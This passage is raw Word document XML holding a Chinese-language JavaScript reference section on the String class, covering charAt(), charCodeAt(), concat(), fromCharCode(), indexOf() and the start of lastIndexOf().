        <w:t>String</w:t>
      </w:r>
      <w:r>
        <w:t>类类型提供了若干操作原始字符串值的方法。</w:t>
      </w:r>
      <w:r>
        <w:t>String</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>length</w:t>
      </w:r>
      <w:r>
        <w:t>属性指定该字符串中的字符的个数。</w:t>
      </w:r>
      <w:r>
        <w:t>String</w:t>
      </w:r>
      <w:r>
        <w:t>类也定义若干操作字符串的方法，</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>例如，有一些从字符串中提取字符或子串的方法，还有一些从字符串中搜索字符或子串的方法。注意，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的字符串是不可变的：</w:t>
      </w:r>
      <w:r>
        <w:t>String</w:t>
      </w:r>
      <w:r>
        <w:t>类的所有方法都不允许改变某个字符串的内容。那些像</w:t>
      </w:r>
      <w:r>
        <w:t>String.toUpperCase()</w:t>
      </w:r>
      <w:r>
        <w:t>之类的方法返回一个全新的字符串，而没有修改原始字符串。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>ECMASc</w:t>
      </w:r>
      <w:r>
        <w:t>ript 5</w:t>
      </w:r>
      <w:r>
        <w:t>以及许多早于</w:t>
      </w:r>
      <w:r>
        <w:t>ES5</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>实现中，字符串的行为类似于每个元素为一个单字符的字符串中只读数组。例如，要提取字符串</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>的第三个字符，可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>s[2]</w:t>
      </w:r>
      <w:r>
        <w:t>来代替</w:t>
      </w:r>
      <w:r>
        <w:t>s.charAt(2)</w:t>
      </w:r>
      <w:r>
        <w:t>。在一个字符串上使用</w:t>
      </w:r>
      <w:r>
        <w:t>for/in</w:t>
      </w:r>
      <w:r>
        <w:t>语句时，它将遍历该字符串中的每一个字符。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参阅</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>第</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>章。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="754" w:name="String_charAt__"/>
      <w:r>
        <w:t>String.charAt()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="754"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>取得一个字符串中第</w:t>
      </w:r>
      <w:r>
        <w:t>"n"</w:t>
      </w:r>
      <w:r>
        <w:t>个字符</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string.charAt(n)</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n</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>希望返回的字符在字符串</w:t>
      </w:r>
      <w:r>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:t>中的索引。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>字符串</w:t>
      </w:r>
      <w:r>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:t>的第</w:t>
      </w:r>
      <w:r>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>个字符。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>String.cha</w:t>
      </w:r>
      <w:r>
        <w:t>rAt()</w:t>
      </w:r>
      <w:r>
        <w:t>返回字符串</w:t>
      </w:r>
      <w:r>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:t>中的第</w:t>
      </w:r>
      <w:r>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>个字符。字符串的第一个字符的编号为</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>。如果</w:t>
      </w:r>
      <w:r>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>不在</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>string.length-1</w:t>
      </w:r>
      <w:r>
        <w:t>之间，这个方法将返回一个空字符串。注意，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中并没有字符数据类型，所以返回的字符实际上是一个长度为</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>的字符串。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参阅</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>String.charCodeAt()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>String.indexOf()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>String.lastIndexOf()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="755" w:name="String_charCodeAt__"/>
      <w:r>
        <w:t>String.charCodeAt()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="755"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>取得字符串中第</w:t>
      </w:r>
      <w:r>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>个字符的编码</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string.charCodeAt(n)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>n</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>待返回编码的字符的索引。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:t>中第</w:t>
      </w:r>
      <w:r>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>个字符的</w:t>
      </w:r>
      <w:r>
        <w:t>Unicode</w:t>
      </w:r>
      <w:r>
        <w:t>编码。返回的值是一个</w:t>
      </w:r>
      <w:r>
        <w:t>16</w:t>
      </w:r>
      <w:r>
        <w:t>位的整数，值在</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>～</w:t>
      </w:r>
      <w:r>
        <w:t>65 535</w:t>
      </w:r>
      <w:r>
        <w:t>之间。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>charCodeAt()</w:t>
      </w:r>
      <w:r>
        <w:t>类似</w:t>
      </w:r>
      <w:r>
        <w:t>charAt()</w:t>
      </w:r>
      <w:r>
        <w:t>，不同之处是它返回指定位置的字符的编码，而不返回包含该字符的子串。如果</w:t>
      </w:r>
      <w:r>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>为负数或大于等于字符串的长度，则</w:t>
      </w:r>
      <w:r>
        <w:t>charCodeAt()</w:t>
      </w:r>
      <w:r>
        <w:t>将返回</w:t>
      </w:r>
      <w:r>
        <w:t>NaN</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>关于从</w:t>
      </w:r>
      <w:r>
        <w:t>Unicode</w:t>
      </w:r>
      <w:r>
        <w:t>编码创建字符串的方法可参阅</w:t>
      </w:r>
      <w:r>
        <w:t>String.fromCharCode()</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String.charAt()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>String.fromCharCode()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="756" w:name="String_concat__"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>String.concat()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="756"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>连接字符串</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>概要</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string.concat(value,...)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>value,...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一个或多个待连接为字符串的值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>由每个参数连接为</w:t>
      </w:r>
      <w:r>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:t>而组成的新的字符串。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>concat()</w:t>
      </w:r>
      <w:r>
        <w:t>将它的每个参数转换为字符串（如果必要的话）并将它们按顺序追加到</w:t>
      </w:r>
      <w:r>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:t>的末尾。它返回最后的连接结果。注意</w:t>
      </w:r>
      <w:r>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:t>本身没有被改变。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>String.concat()</w:t>
      </w:r>
      <w:r>
        <w:t>与</w:t>
      </w:r>
      <w:r>
        <w:t>Array.concat()</w:t>
      </w:r>
      <w:r>
        <w:t>类似。注意使用</w:t>
      </w:r>
      <w:r>
        <w:t>“+”</w:t>
      </w:r>
      <w:r>
        <w:t>操作符来执行字符串连接经常更简单一些。</w:t>
      </w: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Array.</w:t>
      </w:r>
      <w:r>
        <w:t>concat()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="757" w:name="String_fromCharCode__"/>
      <w:r>
        <w:t>String.fromCharCode()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="757"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>从字符编码创建一个字符串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t>String.fromCharCode(c1,c2,...)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>c1,c2,...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>指定待创建字符串中的字符的</w:t>
      </w:r>
      <w:r>
        <w:t>Unicode</w:t>
      </w:r>
      <w:r>
        <w:t>编码，一个或多个整数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一个新的字符串，内容为指定编码对应的字符。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>描述</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个静态方法提供一个通过指定每个字符的</w:t>
      </w:r>
      <w:r>
        <w:t>Unicode</w:t>
      </w:r>
      <w:r>
        <w:t>编码数字来创建字符串的方式。注意，作为一个静态方法，</w:t>
      </w:r>
      <w:r>
        <w:t>fromCharCode()</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>String()</w:t>
      </w:r>
      <w:r>
        <w:t>构造函数的一个属性，实际上不是字符串或</w:t>
      </w:r>
      <w:r>
        <w:t>String</w:t>
      </w:r>
      <w:r>
        <w:t>对象的方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>String.charCodeAt()</w:t>
      </w:r>
      <w:r>
        <w:t>与这个方法对应，它提供一个取得指定字符串中单个字符的编码的方法。</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w:t>
      </w:r>
      <w:r>
        <w:t>创建字符串</w:t>
      </w:r>
      <w:r>
        <w:t>"hello"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var s=String.fromCharCode(104,101,108,108,111);</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String.charCodeAt()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="758" w:name="String_indexOf__"/>
      <w:r>
        <w:t>String</w:t>
      </w:r>
      <w:r>
        <w:t>.indexOf()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="758"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>搜索一个字符串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t>string.indexOf(substring)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string.indexOf(substring,start)</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substring</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>要在</w:t>
      </w:r>
      <w:r>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:t>中搜索的子串。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>start</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>一个可选的整数参数，指定该次搜索在字符串</w:t>
      </w:r>
      <w:r>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:t>中的开始位置。合法的值为</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>（字符串中的第一个字符的位置）到</w:t>
      </w:r>
      <w:r>
        <w:t>string.length-1</w:t>
      </w:r>
      <w:r>
        <w:t>（字符串中最后一个字符的位置）。如果省略了这个参数，则搜索将从给定字符串的第一个字符开始。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在字符串</w:t>
      </w:r>
      <w:r>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:t>中</w:t>
      </w:r>
      <w:r>
        <w:t>start</w:t>
      </w:r>
      <w:r>
        <w:t>位置之后，</w:t>
      </w:r>
      <w:r>
        <w:t>substring</w:t>
      </w:r>
      <w:r>
        <w:t>第一次出现的位置，如果没有找到则返回</w:t>
      </w:r>
      <w:r>
        <w:t>-1</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String.indexOf()</w:t>
      </w:r>
      <w:r>
        <w:t>搜索指定的字符串</w:t>
      </w:r>
      <w:r>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:t>，从前到后搜索，检查它是否包含指定的子串</w:t>
      </w:r>
      <w:r>
        <w:t>substring</w:t>
      </w:r>
      <w:r>
        <w:t>。搜索开始于</w:t>
      </w:r>
      <w:r>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:t>start</w:t>
      </w:r>
      <w:r>
        <w:t>位置，如果没有指定</w:t>
      </w:r>
      <w:r>
        <w:t>start</w:t>
      </w:r>
      <w:r>
        <w:t>则从</w:t>
      </w:r>
      <w:r>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:t>的开头开始搜索。如果发现了子串</w:t>
      </w:r>
      <w:r>
        <w:t>substring</w:t>
      </w:r>
      <w:r>
        <w:t>，则</w:t>
      </w:r>
      <w:r>
        <w:t>String.indexOf()</w:t>
      </w:r>
      <w:r>
        <w:t>将返回</w:t>
      </w:r>
      <w:r>
        <w:t>substring</w:t>
      </w:r>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:t>中第一次出现时第一个字符所在的位置。</w:t>
      </w:r>
      <w:r>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:t>中字符的位置从</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>开始编号。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:t>中没有找到</w:t>
      </w:r>
      <w:r>
        <w:t>substring</w:t>
      </w:r>
      <w:r>
        <w:t>，则</w:t>
      </w:r>
      <w:r>
        <w:t>String.indexOf()</w:t>
      </w:r>
      <w:r>
        <w:t>返回</w:t>
      </w:r>
      <w:r>
        <w:t>-1</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String.charAt()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>String.lastIndexOf()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>String.substring()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="759" w:name="String_lastIndexOf__"/>
      <w:r>
        <w:t>String.lastIndexOf()</w:t>
      </w:r>
      <w:bookmarkEnd w:id="759"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>从后面开始搜索一个字符串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t>string.lastIndexOf(substring)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>string.lastIndexOf(substring,start)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>参数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>substring</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
